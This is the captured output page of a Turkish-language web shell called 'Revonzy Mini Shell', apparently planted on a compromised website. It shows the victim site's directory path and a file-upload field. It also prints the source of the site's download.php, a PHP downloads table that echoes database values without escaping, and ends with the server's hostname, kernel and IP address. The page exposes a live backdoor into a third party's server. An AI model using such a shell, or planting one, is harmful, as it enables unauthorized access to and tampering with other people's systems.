Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/qrscandoctor.in/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/qrscandoctor.in/download.php

<?php
include("header.php");
?>
<style>
<style>
table {
  font-family: arial, sans-serif;
  border-collapse: collapse;
  text-align:center;
  width: 100%;
  text-decoration:none;
 
}

td, th {
  border: 1px solid #dddddd;
  text-align: left;
  padding: 8px;
   text-align:center;
   text-decoration:none;
   
}

tr:nth-child(even) {
  background-color: #dddddd;
   text-align:center;
    text-decoration:none;
}
</style>
</style>
  <div class="gallery section py-5" style="background-color:#f9f9ff;">
<div class="container">
	<div class="h3-head text-center">
		<h3 class="title-1">Downloads</h3>
	</div>
	<div>
 <div class="row" style="min-height:700px;">
 <table style="width:100%">
  <tr style=" background-color:#880015; color:white;">
    <th>Sr.No</th>
	<th>Title</th>
	<th>File</th> 
   
  </tr>
<?php
$report_details = $db->get_all_downloads_images();
if(!empty($report_details))
{
	$counter =0;
	foreach($report_details as $record)
	{
		$id				=	$report_details[$counter][0];
		$title			=	$report_details[$counter][1];
		$images			=	$report_details[$counter][2];
?>
	<tr>
     <td><?php echo $counter+1; ?></td>
	 <td><?php echo $title; ?></td>
	<td><a href="downloads/<?php echo $images; ?>" target="_blank"><img src="gallery/pdf.png" height="50px" width="50px"></a></td>
    </tr>	
<?php
	$counter++;
			}
		}
		else
		{
		?>
		<tr>
			<td colspan="4">No Data Found...</td>
		</tr>
		 
		<?php
		}
	?>
</table>	
	</div>
	</div>
	</div>
 <?php
	include('footer.php');
?>  

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4